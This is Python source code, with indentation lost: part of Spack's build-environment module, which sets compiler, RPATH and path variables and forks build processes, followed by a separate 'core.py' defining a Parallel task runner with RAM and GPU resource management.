link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, pkg.spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(pkg.spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
environment = compiler.environment
for command, variable in iteritems(environment):
if command == 'set':
for name, value in iteritems(variable):
env.set(name, value)
elif command == 'unset':
for name, _ in iteritems(variable):
env.unset(name)
elif command == 'prepend-path':
for name, value in iteritems(variable):
env.prepend_path(name, value)
elif command == 'append-path':
for name, value in iteritems(variable):
env.append_path(name, value)
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# number of jobs spack will build with.
jobs = spack.config.get('config:build_jobs') or multiprocessing.cpu_count()
if not pkg.parallel:
jobs = 1
elif pkg.make_jobs:
jobs = pkg.make_jobs
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
spack_env = EnvironmentModifications()
run_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, spack_env)
set_build_environment_variables(pkg, spack_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, spack_env)
# traverse in postorder so package can use vars from its dependencies
spec = pkg.spec
for dspec in pkg.spec.traverse(order='post', root=False,
deptype=('build', 'test')):
spkg = dspec.package
set_module_variables_for_package(spkg)
# Allow dependencies to modify the module
dpkg = dspec.package
dpkg.setup_dependent_package(pkg.module, spec)
dpkg.setup_dependent_environment(spack_env, run_env, spec)
if (not dirty) and (not spack_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_environment(spack_env, run_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the spack_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(spack_env, tty.warn)
spack_env.apply_modifications()
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
|
core.py
|
import os
import dill
import time
import pprint
import random
import signal
import inspect
import logging
import platform
from typing import *
from tqdm import tqdm
from pathos.pools import ProcessPool
from multiprocessing import Process
from multiprocessing.managers import SyncManager
from ..misc import *
from ..manage import *
from ..misc import grouped
LINUX = platform.system() == "Linux"
dill._dill._reverse_typemap["ClassType"] = type
class Parallel(PureLoggingMixin):
"""
Util class which can help running tasks in parallel.
Warnings
----------
On platforms other than Linux, functions are dramatically reduced because
only Linux system well supports pickling. In this occasion, `Parallel`
will simply leverage `pathos` to do the jobs.
Parameters
----------
num_jobs : int, number of jobs run in parallel.
sleep : float, idle duration of new jobs.
use_tqdm: bool, whether show progress bar (with tqdm) or not.
use_cuda: bool, whether tasks need CUDA or not.
name : str, summary name of these tasks.
meta_name : str, name of the meta information.
logging_folder : str, where the logging will be placed.
task_names : List[str], names of each task.
resource_config : Dict[str, Any], config used in `ResourceManager`.
Examples
----------
>>> def add_one(x):
>>> import time
>>> time.sleep(1)
>>> return x + 1
>>>
>>> print(Parallel(10)(add_one, list(range(10))).parallel_results)
"""
class _ParallelError(Exception):
pass
def __init__(
self,
num_jobs: int,
*,
sleep: float = 1.0,
use_tqdm: bool = True,
use_cuda: bool = False,
name: Optional[str] = None,
meta_name: Optional[str] = None,
logging_folder: Optional[str] = None,
task_names: Optional[List[str]] = None,
tqdm_config: Optional[Dict[str, Any]] = None,
resource_config: Optional[Dict[str, Any]] = None,
warn_num_jobs: bool = True,
):
self._rs = None
self._use_tqdm, self._use_cuda = use_tqdm, use_cuda
self._num_jobs, self._sleep = num_jobs, sleep
if tqdm_config is None:
tqdm_config = {}
if resource_config is None:
resource_config = {}
if logging_folder is None:
logging_folder = os.path.join(os.getcwd(), "_parallel_", "logs")
self._tqdm_config = tqdm_config
self._resource_config = resource_config
self._name, self._meta_name = name, meta_name
self._logging_folder, self._task_names = logging_folder, task_names
self._refresh_patience = resource_config.setdefault("refresh_patience", 10)
self._init_logger(self.meta_log_name)
self._warn_num_jobs = warn_num_jobs
def __call__(self, f: Callable, *args_list: Any) -> "Parallel":
# if f returns a dict with 'terminate' key, Parallel can be terminated at
# early stage by setting 'terminate' key to True
n_tasks = len(args_list[0])
n_jobs = min(self._num_jobs, n_tasks)
if self._task_names is None:
self._task_names = [None] * n_tasks
if not LINUX or n_jobs <= 1:
if LINUX and self._warn_num_jobs:
print(
f"{LoggingMixin.warning_prefix}Detected Linux system but "
f"n_jobs={n_jobs}, functions will be dramatically reduced.\n"
"* It is recommended to set n_jobs to a larger value"
)
results = []
task_names = list(map(self._get_task_name, range(n_tasks)))
if n_jobs <= 1:
iterator = (f(*args) for args in zip(*args_list))
else:
p = ProcessPool(ncpus=n_jobs)
iterator = p.imap(f, *args_list)
if self._use_tqdm:
iterator = tqdm(iterator, total=n_tasks, **self._tqdm_config)
for result in iterator:
results.append(result)
self._rs = dict(zip(task_names, results))
return self
self._func, self._args_list = f, args_list
self._cursor, self._all_task_indices = 0, list(range(n_jobs, n_tasks))
self._log_meta_msg("initializing sync manager")
self._sync_manager = SyncManager()
self._sync_manager.start(lambda: signal.signal(signal.SIGINT, signal.SIG_IGN))
meta = {"n_jobs": n_jobs, "n_tasks": n_tasks, "terminated": False}
self._rs = self._sync_manager.dict(
{
"__meta__": meta,
"__exceptions__": {},
}
)
self._overwritten_task_info = {}
self._pid2task_idx = None
self._log_meta_msg("initializing resource manager")
self._resource_manager = ResourceManager(
self._resource_config, self._get_task_name, self._refresh_patience
)
self._log_meta_msg("registering PC manager")
pc_manager = PCManager()
ram_methods = {
"get_pid_usage_dict": None,
"get_pid_usage": pc_manager.get_pid_ram_usage,
"get_available_dict": lambda: {"total": pc_manager.get_available_ram()},
}
self._resource_manager.register("RAM", ram_methods)
gpu_config = self._resource_config.setdefault("gpu_config", {})
default_cuda_list = None if self._use_cuda else []
available_cuda_list = gpu_config.setdefault(
"available_cuda_list", default_cuda_list
)
if available_cuda_list is None or available_cuda_list:
self._log_meta_msg("registering GPU manager")
if available_cuda_list is not None:
available_cuda_list = list(map(int, available_cuda_list))
gpu_manager = GPUManager(available_cuda_list)
gpu_methods = {
"get_pid_usage": None,
"get_pid_usage_dict": gpu_manager.get_pid_usages,
"get_available_dict": gpu_manager.get_gpu_frees,
}
self._resource_manager.register("GPU", gpu_methods)
self._resource_manager.register_logging(self._init_logger, self)
self._log_meta_msg("initializing with refreshing")
self._refresh(skip_check_finished=True)
self._working_processes = None
if not self._use_tqdm:
self._tqdm_bar = None
else:
self._tqdm_bar = tqdm(list(range(n_tasks)), **self._tqdm_config)
try:
self._log_meta_msg("initializing processes")
init_task_indices = list(range(n_jobs))
init_processes = [
self._get_process(i, start=False) for i in init_task_indices
]
if self.terminated:
self._user_terminate()
init_failed_slots, init_failed_task_indices = [], []
for i, (task_idx, process) in enumerate(
zip(init_task_indices, init_processes)
):
if process is None:
init_failed_slots.append(i)
init_failed_task_indices.append(task_idx)
task_name = self._get_task_name(task_idx)
self._log_with_meta(
task_name,
"initialization failed, it may due to lack of resources",
msg_level=logging.WARNING,
)
if init_failed_slots:
for slot in init_failed_slots:
init_task_indices[slot] = None
init_processes[slot] = [None] * 4
self._all_task_indices = (
init_failed_task_indices + self._all_task_indices
)
self._working_task_indices = init_task_indices
self._working_processes, task_info = map(list, zip(*init_processes))
self._log_meta_msg("starting all initial processes")
tuple(
map(
lambda p_: None if p_ is None else p_.start(),
self._working_processes,
)
)
tuple(
map(
self._record_process,
self._working_task_indices,
self._working_processes,
task_info,
)
)
self._resource_manager.initialize_running_usages()
self._log_meta_msg("entering parallel main loop")
while True:
self._log_meta_msg("waiting for finished slot")
self._wait_and_handle_finish(wait_until_finish=True)
if not self._add_new_processes():
break
except KeyboardInterrupt:
self.exception(self.meta_log_name, f"keyboard interrupted")
exceptions = self.exceptions
exceptions["base"] = self._ParallelError("Keyboard Interrupted")
self._rs["__exceptions__"] = exceptions
except Exception as err:
self.exception(self.meta_log_name, f"exception occurred, {err}")
exceptions = self.exceptions
exceptions["base"] = err
self._rs["__exceptions__"] = exceptions
finally:
self._log_meta_msg("joining processes left behind")
if self._working_processes is not None:
for process in self._working_processes:
if process is None:
continue
process.join()
if self._tqdm_bar is not None:
self._tqdm_bar.close()
self._log_meta_msg("casting parallel results to Python dict")
self._rs = dict(self._rs)
self._log_meta_msg("shutting down sync manager")
self._sync_manager.shutdown()
self.log_block_msg(
self.meta_log_name,
"parallel results",
pprint.pformat(self._rs, compact=True),
)
return self
def grouped(self, f: Callable, *args_list: Any) -> "Parallel":
num_jobs = min(len(args_list[0]), self._num_jobs)
grouped_args_list = [grouped_into(args, num_jobs) for args in args_list]
def _grouped_f(i: int, *args_list_: Tuple[Any], cuda: Any = None) -> List[Any]:
results: List[Any] = []
kwargs = {} if not self._use_cuda else {"cuda": cuda}
for args in tqdm(
zip(*args_list_),
total=len(args_list_[0]),
position=i + 1,
leave=False,
):
results.append(f(*args, **kwargs))
return results
return self(_grouped_f, list(range(num_jobs)), *grouped_args_list)
@property
def meta(self) -> Dict[str, Any]:
return self._rs["__meta__"]
@property
def exceptions(self) -> Dict[str, Any]:
return self._rs["__exceptions__"]
@property
def terminated(self) -> bool:
return self.meta["terminated"]
@property
def parallel_results(self) -> Dict[str, Any]:
return self._rs
@property
def ordered_results(self) -> List[Any]:
return [None if key is None else self._rs[key] for key in self._task_names]
def __sleep(self, skip_check_finished: bool) -> None:
time.sleep(self._sleep + random.random())
self._refresh(skip_check_finished=skip_check_finished)
def __wait(self, wait_until_finished: bool) -> List[int]:
try:
while True:
task_names = ", ".join(
map(
self._get_task_name,
filter(bool, self._working_task_indices),
)
)
self._log_meta_msg(
"waiting for slots (working tasks : {task_names})",
msg_level=logging.DEBUG,
)
finished_slots = []
for i, (task_idx, process) in enumerate(
zip(self._working_task_indices, self._working_processes)
):
if process is None:
self._log_meta_msg(f"pending on slot {i}")
finished_slots.append(i)
continue
task_name = self._get_task_name(task_idx)
if not process.is_alive():
msg = f"in slot {i} is found finished"
self._log_with_meta(task_name, msg)
finished_slots.append(i)
if not wait_until_finished or finished_slots:
return finished_slots
self.__sleep(skip_check_finished=True)
except KeyboardInterrupt:
self._set_terminate(scope="wait")
